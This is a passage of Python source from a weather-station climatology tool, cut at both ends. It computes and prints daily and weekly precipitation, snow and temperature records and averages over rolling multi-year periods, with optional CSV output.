end="") if x != c_records["tmaxPROP"]["day_max"][1][-1] else print(x.daystr) if c_records["tmaxPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMAX: {}".format(c_records["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in c_records["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["tmaxPROP"]["day_min"][1][-1] else print(x.daystr) try: print(" Avg MIN Temperature: {}".format(round(mean(c_tmin),1)),end="") print(", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(c_tmin),1))+1)),end="") if len(c_tmin) > EXCLD and tmindeschist.index(round(mean(c_tmin),1)) <= tminaschist.index(round(mean(c_tmin),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(c_tmin),1))+1))) if len(c_tmin) > EXCLD and tminaschist.index(round(mean(c_tmin),1)) <= tmindeschist.index(round(mean(c_tmin),1)) else print("") except: print(" Avg MIN Temperature: N/A") if c_records["tminPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMIN: {}".format(c_records["tminPROP"]["day_max"][0]),end = " ::: ") for x in c_records["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["tminPROP"]["day_max"][1][-1] else print(x.daystr) if c_records["tminPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMIN: {}".format(c_records["tminPROP"]["day_min"][0]),end = " ::: ") for x in c_records["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["tminPROP"]["day_min"][1][-1] else print(x.daystr) print("-----") print("") def dayReport(m,d,climatology=30,increment=5,output=False): """Detailed Climatological Report for a given day. Args (Required): m: month (int) d: day (int) Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: dayReport(5,1) -> Returns a 30-yr, 5-yr incremented climatological report for May 1st. dayReport(1,4,climatology=10) -> Returns a 10-yr,5-yr incremented climatological report for Jan 4th. dayReport(12,9,output=True) -> Returns a 30-yr,5-yr incremented climatological report for Dec 9th and outputs a CSV report of the findings. """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in clmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1), "prcp": [],"prcpPROP":{"days":0,"day_max":[-1,[]]}, "snow": [],"snowPROP":{"days":0,"day_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmax": [],"tmaxPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmin": [],"tminPROP":{"day_max":[-999,[]],"day_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]), "prcp": [],"prcpPROP":{"days":0,"day_max":[-1,[]]}, "snow": [],"snowPROP":{"days":0,"day_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmax": [],"tmaxPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmin": [],"tminPROP":{"day_max":[-999,[]],"day_min":[999,[]]}} for y in valid_yrs: if checkDate2(y,m,d): if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: alltime["prcp"].append(float(clmt[y][m][d].prcp)) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": alltime["prcpPROP"]["days"] += 1 if float(clmt[y][m][d].prcp) == alltime["prcpPROP"]["day_max"][0]: alltime["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif float(clmt[y][m][d].prcp) > alltime["prcpPROP"]["day_max"][0]: alltime["prcpPROP"]["day_max"][0] = float(clmt[y][m][d].prcp) alltime["prcpPROP"]["day_max"][1] = [] alltime["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["prcp"].append(float(clmt[y][m][d].prcp)) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": climo30yrs[c]["prcpPROP"]["days"] += 1 if float(clmt[y][m][d].prcp) == climo30yrs[c]["prcpPROP"]["day_max"][0]: climo30yrs[c]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif float(clmt[y][m][d].prcp) > climo30yrs[c]["prcpPROP"]["day_max"][0]: climo30yrs[c]["prcpPROP"]["day_max"][0] = float(clmt[y][m][d].prcp) climo30yrs[c]["prcpPROP"]["day_max"][1] = [] climo30yrs[c]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: alltime["snow"].append(float(clmt[y][m][d].snow)) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": alltime["snowPROP"]["days"] += 1 if float(clmt[y][m][d].snow) == alltime["snowPROP"]["day_max"][0]: alltime["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif float(clmt[y][m][d].snow) > alltime["snowPROP"]["day_max"][0]: alltime["snowPROP"]["day_max"][0] = float(clmt[y][m][d].snow) alltime["snowPROP"]["day_max"][1] = [] alltime["snowPROP"]["day_max"][1].append(clmt[y][m][d]) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["snow"].append(float(clmt[y][m][d].snow)) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": climo30yrs[c]["snowPROP"]["days"] += 1 if float(clmt[y][m][d].snow) == climo30yrs[c]["snowPROP"]["day_max"][0]: climo30yrs[c]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif float(clmt[y][m][d].snow) > climo30yrs[c]["snowPROP"]["day_max"][0]: climo30yrs[c]["snowPROP"]["day_max"][0] = float(clmt[y][m][d].snow) climo30yrs[c]["snowPROP"]["day_max"][1] = [] climo30yrs[c]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): alltime["tempAVGlist"].append(int(clmt[y][m][d].tmax)) alltime["tempAVGlist"].append(int(clmt[y][m][d].tmin)) if mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) == alltime["tavgPROP"]["day_max"][0]: alltime["tavgPROP"]["day_max"][1].append(clmt[y][m][d]) elif mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) > alltime["tavgPROP"]["day_max"][0]: alltime["tavgPROP"]["day_max"][0] = mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) alltime["tavgPROP"]["day_max"][1] = [] alltime["tavgPROP"]["day_max"][1].append(clmt[y][m][d]) if mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) == alltime["tavgPROP"]["day_min"][0]: alltime["tavgPROP"]["day_min"][1].append(clmt[y][m][d]) elif mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) < alltime["tavgPROP"]["day_min"][0]: alltime["tavgPROP"]["day_min"][0] = mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) alltime["tavgPROP"]["day_min"][1] = [] alltime["tavgPROP"]["day_min"][1].append(clmt[y][m][d]) for c in climo30yrs: #if 1906 <= y <= 1915: print(y,c[0],c[1],c,y >= c[0] and y <= c[1]) if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) climo30yrs[c]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) if mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) == climo30yrs[c]["tavgPROP"]["day_max"][0]: climo30yrs[c]["tavgPROP"]["day_max"][1].append(clmt[y][m][d]) elif mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) > climo30yrs[c]["tavgPROP"]["day_max"][0]: climo30yrs[c]["tavgPROP"]["day_max"][0] = mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) climo30yrs[c]["tavgPROP"]["day_max"][1] = [] climo30yrs[c]["tavgPROP"]["day_max"][1].append(clmt[y][m][d]) if mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) == climo30yrs[c]["tavgPROP"]["day_min"][0]: climo30yrs[c]["tavgPROP"]["day_min"][1].append(clmt[y][m][d]) elif mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) < climo30yrs[c]["tavgPROP"]["day_min"][0]: climo30yrs[c]["tavgPROP"]["day_min"][0] = mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) climo30yrs[c]["tavgPROP"]["day_min"][1] = [] climo30yrs[c]["tavgPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: alltime["tmax"].append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == alltime["tmaxPROP"]["day_max"][0]: alltime["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > alltime["tmaxPROP"]["day_max"][0]: alltime["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) alltime["tmaxPROP"]["day_max"][1] = [] alltime["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == alltime["tmaxPROP"]["day_min"][0]: alltime["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < alltime["tmaxPROP"]["day_min"][0]: alltime["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) alltime["tmaxPROP"]["day_min"][1] = [] alltime["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tmax"].append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == climo30yrs[c]["tmaxPROP"]["day_max"][0]: climo30yrs[c]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > climo30yrs[c]["tmaxPROP"]["day_max"][0]: climo30yrs[c]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) climo30yrs[c]["tmaxPROP"]["day_max"][1] = [] climo30yrs[c]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == climo30yrs[c]["tmaxPROP"]["day_min"][0]: climo30yrs[c]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < climo30yrs[c]["tmaxPROP"]["day_min"][0]: climo30yrs[c]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) climo30yrs[c]["tmaxPROP"]["day_min"][1] = [] climo30yrs[c]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: alltime["tmin"].append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == alltime["tminPROP"]["day_max"][0]: alltime["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > alltime["tminPROP"]["day_max"][0]: alltime["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) alltime["tminPROP"]["day_max"][1] = [] alltime["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == alltime["tminPROP"]["day_min"][0]: alltime["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < alltime["tminPROP"]["day_min"][0]: alltime["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) alltime["tminPROP"]["day_min"][1] = [] alltime["tminPROP"]["day_min"][1].append(clmt[y][m][d]) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tmin"].append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == climo30yrs[c]["tminPROP"]["day_max"][0]: climo30yrs[c]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > climo30yrs[c]["tminPROP"]["day_max"][0]: climo30yrs[c]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) climo30yrs[c]["tminPROP"]["day_max"][1] = [] climo30yrs[c]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == climo30yrs[c]["tminPROP"]["day_min"][0]: climo30yrs[c]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < climo30yrs[c]["tminPROP"]["day_min"][0]: climo30yrs[c]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) climo30yrs[c]["tminPROP"]["day_min"][1] = [] climo30yrs[c]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) for c in climo30yrs: print("tavg: ", c, ":", climo30yrs[c]["tempAVGlist"]) print("tmax: ", c, ":", climo30yrs[c]["tmax"]) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for {} {}".format(calendar.month_name[m],d)) print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("{:▒^9} {:▒^12} {:▒^12} {:▒^8} {:▒^9} {:▒^9} {:▒^8} {:▒^9} {:▒^9}".format("YEARS","PRCP","SNOW","TMAX","TMAX","TMAX","TMIN","TMIN","TMIN")) print("{:▒^9} {:▒^12} {:▒^12} {:▒^8} {:▒^9} {:▒^9} {:▒^8} {:▒^9} {:▒^9}".format( "","hi","hi","avg","hi","lo","avg","hi","lo")) print("{:.^9} {:.^12} {:.^12} {:.^8} {:.^9} {:.^9} {:.^8} {:.^9} {:.^9}".format("","","","","","","","","")) print("{:^9} {:>6.2f}, {:>4} {:>6.1f}, {:^4} {:^8.1f} {:>3}, {:^4} {:>3}, {:^4} {:^8.1f} {:>3}, {:^4} {:>3}, {:^4}".format("All Time", alltime["prcpPROP"]["day_max"][0],len(alltime["prcpPROP"]["day_max"][1]) if len(alltime["prcpPROP"]["day_max"][1]) > 1 else alltime["prcpPROP"]["day_max"][1][0].daystr[0:4], alltime["snowPROP"]["day_max"][0],len(alltime["snowPROP"]["day_max"][1]) if len(alltime["snowPROP"]["day_max"][1]) > 1 else alltime["snowPROP"]["day_max"][1][0].daystr[0:4], round(mean(alltime["tmax"]),1), alltime["tmaxPROP"]["day_max"][0],len(alltime["tmaxPROP"]["day_max"][1]) if len(alltime["tmaxPROP"]["day_max"][1]) > 1 else alltime["tmaxPROP"]["day_max"][1][0].daystr[0:4], alltime["tmaxPROP"]["day_min"][0],len(alltime["tmaxPROP"]["day_min"][1]) if len(alltime["tmaxPROP"]["day_min"][1]) > 1 else alltime["tmaxPROP"]["day_min"][1][0].daystr[0:4], round(mean(alltime["tmin"]),1), alltime["tminPROP"]["day_max"][0],len(alltime["tminPROP"]["day_max"][1]) if len(alltime["tminPROP"]["day_max"][1]) > 1 else alltime["tminPROP"]["day_max"][1][0].daystr[0:4], alltime["tminPROP"]["day_min"][0],len(alltime["tminPROP"]["day_min"][1]) if len(alltime["tminPROP"]["day_min"][1]) > 1 else alltime["tminPROP"]["day_min"][1][0].daystr[0:4])) for c in climo30yrs: try: print("{:^9} {:>6.2f}, {:>4} {:>6.1f}, {:^4} {:^8.1f} {:>3}, {:^4} {:>3}, {:^4} {:^8.1f} {:>3}, {:^4} {:>3}, {:^4}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["day_max"][0], len(climo30yrs[c]["prcpPROP"]["day_max"][1]) if len(climo30yrs[c]["prcpPROP"]["day_max"][1]) > 1 else climo30yrs[c]["prcpPROP"]["day_max"][1][0].daystr[0:4], climo30yrs[c]["snowPROP"]["day_max"][0], len(climo30yrs[c]["snowPROP"]["day_max"][1]) if len(climo30yrs[c]["snowPROP"]["day_max"][1]) > 1 else climo30yrs[c]["snowPROP"]["day_max"][1][0].daystr[0:4], round(mean(climo30yrs[c]["tmax"]),1), climo30yrs[c]["tmaxPROP"]["day_max"][0], len(climo30yrs[c]["tmaxPROP"]["day_max"][1]) if len(climo30yrs[c]["tmaxPROP"]["day_max"][1]) > 1 else climo30yrs[c]["tmaxPROP"]["day_max"][1][0].daystr[0:4], climo30yrs[c]["tmaxPROP"]["day_min"][0], len(climo30yrs[c]["tmaxPROP"]["day_min"][1]) if len(climo30yrs[c]["tmaxPROP"]["day_min"][1]) > 1 else climo30yrs[c]["tmaxPROP"]["day_min"][1][0].daystr[0:4], round(mean(climo30yrs[c]["tmin"]),1), climo30yrs[c]["tminPROP"]["day_max"][0], len(climo30yrs[c]["tminPROP"]["day_max"][1]) if len(climo30yrs[c]["tminPROP"]["day_max"][1]) > 1 else climo30yrs[c]["tminPROP"]["day_max"][1][0].daystr[0:4], climo30yrs[c]["tminPROP"]["day_min"][0], len(climo30yrs[c]["tminPROP"]["day_min"][1]) if len(climo30yrs[c]["tminPROP"]["day_min"][1]) > 1 else climo30yrs[c]["tminPROP"]["day_min"][1][0].daystr[0:4])) except: print(c) print("") if output == True: newfn = "dayReport_" + str(calendar.month_abbr[m]) + str(d) + "_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period ({} {})".format(calendar.month_abbr[m],d),"PRCP Days","PRCP stdev","PRCP AVG","SNOW Days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmin"]),1))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") try:w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") except: print(x, climo30yrs[x]["tempAVGlist"]) w.write("{:.1f}".format(round(mean(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmin"]),1))); w.write("\n") print("*** csv output successful ***") def weekReport(m,d,climatology=30,increment=5,output=False): """Detailed Climatological Report for a given week where the given day is the week center (3 days prior + given day + 3 days after = 7 days). Args (Required): m: month (int) d: day (int) Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: weekReport(1,7) -> Returns a 30-yr, 5-yr incremented climatological report for the week of Jan 4 - Jan 10. weekReport(7,20,climatology=10) -> Returns a 10-yr, 5-yr incremented climatological report for the week of July 17 - July 23 weekReport(9,6,climatology=15,increment=1,output=True) -> Returns a 5-yr incremented, 15yr climatology report for the week of Sep 3 - Sep 9. It also outputs a CSV report of the findings. """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in clmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"week_max":[-1,[]]}, "snow": [],"snowPROP":{"days":0,"week_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"week_max":[-999,[]],"week_min":[999,[]]}, "tmax": [],"tmaxPROP":{"week_max":[-999,[]],"week_min":[999,[]]}, "tmin": [],"tminPROP":{"week_max":[-999,[]],"week_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"week_max":[-1,[]]}, "snow": [],"snowPROP":{"days":0,"week_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"week_max":[-999,[]],"week_min":[999,[]]}, "tmax": [],"tmaxPROP":{"week_max":[-999,[]],"week_min":[999,[]]}, "tmin": [],"tminPROP":{"week_max":[-999,[]],"week_min":[999,[]]}} if m == 2 and d == 29: d = 28 for y in valid_yrs: wkstart = datetime.date(y,m,d) - datetime.timedelta(days=3) currday = wkstart wkend = datetime.date(y,m,d) + datetime.timedelta(days=3) wk = [] wk_prcp = [] wk_snow = [] wk_tempAVGlist = [] wk_tmax = [] wk_tmin = [] for DAY in range(7): try: wk.append(clmt[currday.year][currday.month][currday.day]) currday += datetime.timedelta(days=1) except: currday += datetime.timedelta(days=1) alltime["total_days"] += len(wk) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] in clmt and c[1] in clmt: climo30yrs[c]["total_days"] += len(wk) if len(wk) > 0: for day in wk: if day.prcpQ in ignoreflags and day.prcp not in ["9999","-9999",""]: #alltime["prcp"].append(float(day.prcp)) if float(day.prcp) > 0 or day.prcpM == "T": alltime["prcpPROP"]["days"] += 1 wk_prcp.append(float(day.prcp)) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): #climo30yrs[c]["prcp"].append(float(day.prcp)) if float(day.prcp) > 0 or day.prcpM == "T": climo30yrs[c]["prcpPROP"]["days"] += 1 if day.snowQ in ignoreflags and day.snow not in ["9999","-9999",""]: alltime["snow"].append(float(day.snow)) if float(day.snow) > 0 or day.snowM == "T": alltime["snowPROP"]["days"] += 1 wk_snow.append(float(day.snow)) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): #climo30yrs[c]["snow"].append(float(day.snow)) if float(day.snow) > 0 or day.snowM == "T": climo30yrs[c]["snowPROP"]["days"] += 1 if day.tmaxQ in ignoreflags and day.tmax not in ["9999","-9999",""] and day.tminQ in ignoreflags and day.tmin not in ["9999","-9999",""]: alltime["tempAVGlist_ind"].append(int(day.tmax)) alltime["tempAVGlist_ind"].append(int(day.tmin)) wk_tempAVGlist.append(int(day.tmax)) wk_tempAVGlist.append(int(day.tmin)) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tempAVGlist_ind"].append(int(day.tmax)) climo30yrs[c]["tempAVGlist_ind"].append(int(day.tmin)) if day.tmaxQ in ignoreflags and day.tmax not in ["9999","-9999",""]: alltime["tmax"].append(int(day.tmax)) wk_tmax.append(int(day.tmax)) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tmax"].append(int(day.tmax)) if day.tminQ in ignoreflags and day.tmin not in ["9999","-9999",""]: alltime["tmin"].append(int(day.tmin)) wk_tmin.append(int(day.tmin)) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tmin"].append(int(day.tmin)) alltime["prcp"].append(sum(wk_prcp)) alltime["snow"].append(sum(wk_snow)) if len(wk_tempAVGlist) > excludeweek_tavg: alltime["tempAVGlist"].append(round(mean(wk_tempAVGlist),1)) # CLIMO STATS HERE ON THIS LEVEL if sum(wk_prcp) == alltime["prcpPROP"]["week_max"][0]: alltime["prcpPROP"]["week_max"][1].append(y) elif sum(wk_prcp) > alltime["prcpPROP"]["week_max"][0]: alltime["prcpPROP"]["week_max"][0] = sum(wk_prcp) alltime["prcpPROP"]["week_max"][1] = [] alltime["prcpPROP"]["week_max"][1].append(y) if sum(wk_snow) == alltime["snowPROP"]["week_max"][0]: alltime["snowPROP"]["week_max"][1].append(y) elif sum(wk_snow) > alltime["snowPROP"]["week_max"][0]: alltime["snowPROP"]["week_max"][0] = sum(wk_snow) alltime["snowPROP"]["week_max"][1] = [] alltime["snowPROP"]["week_max"][1].append(y) # "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"week_max":[-999,[]],"week_min":[999,[]]}, if len(wk_tempAVGlist) > excludeweek_tavg: alltime["tempAVGlist"].append(round(mean(wk_tempAVGlist),1)) if round(mean(wk_tempAVGlist),1) == alltime["tavgPROP"]["week_max"][0]: alltime["tavgPROP"]["week_max"][1].append(y) elif round(mean(wk_tempAVGlist),1) > alltime["tavgPROP"]["week_max"][0]: alltime["tavgPROP"]["week_max"][0] = mean(wk_tempAVGlist) alltime["tavgPROP"]["week_max"][1] = [] alltime["tavgPROP"]["week_max"][1].append(y) if round(mean(wk_tempAVGlist),1) == alltime["tavgPROP"]["week_min"][0]: alltime["tavgPROP"]["week_min"][1].append(y) elif round(mean(wk_tempAVGlist),1) < alltime["tavgPROP"]["week_min"][0]: alltime["tavgPROP"]["week_min"][0] = round(mean(wk_tempAVGlist),1) alltime["tavgPROP"]["week_min"][1] = [] alltime["tavgPROP"]["week_min"][1].append(y) if len(wk_tmax) > excludeweek: if mean(wk_tmax) == alltime["tmaxPROP"]["week_max"][0]: alltime["tmaxPROP"]["week_max"][1].append(y) elif mean(wk_tmax) > alltime["tmaxPROP"]["week_max"][0]: alltime["tmaxPROP"]["week_max"][0] = mean(wk_tmax) alltime["tmaxPROP"]["week_max"][1] = [] alltime["tmaxPROP"]["week_max"][1].append(y) if mean(wk_tmax) == alltime["tmaxPROP"]["week_min"][0]: alltime["tmaxPROP"]["week_min"][1].append(y) elif mean(wk_tmax) < alltime["tmaxPROP"]["week_min"][0]: alltime["tmaxPROP"]["week_min"][0] = mean(wk_tmax) alltime["tmaxPROP"]["week_min"][1] = [] alltime["tmaxPROP"]["week_min"][1].append(y) if len(wk_tmin) > excludeweek: if mean(wk_tmin) == alltime["tminPROP"]["week_max"][0]: alltime["tminPROP"]["week_max"][1].append(y) elif mean(wk_tmin) > alltime["tminPROP"]["week_max"][0]: alltime["tminPROP"]["week_max"][0] = mean(wk_tmin) alltime["tminPROP"]["week_max"][1] = [] alltime["tminPROP"]["week_max"][1].append(y) if mean(wk_tmin) == 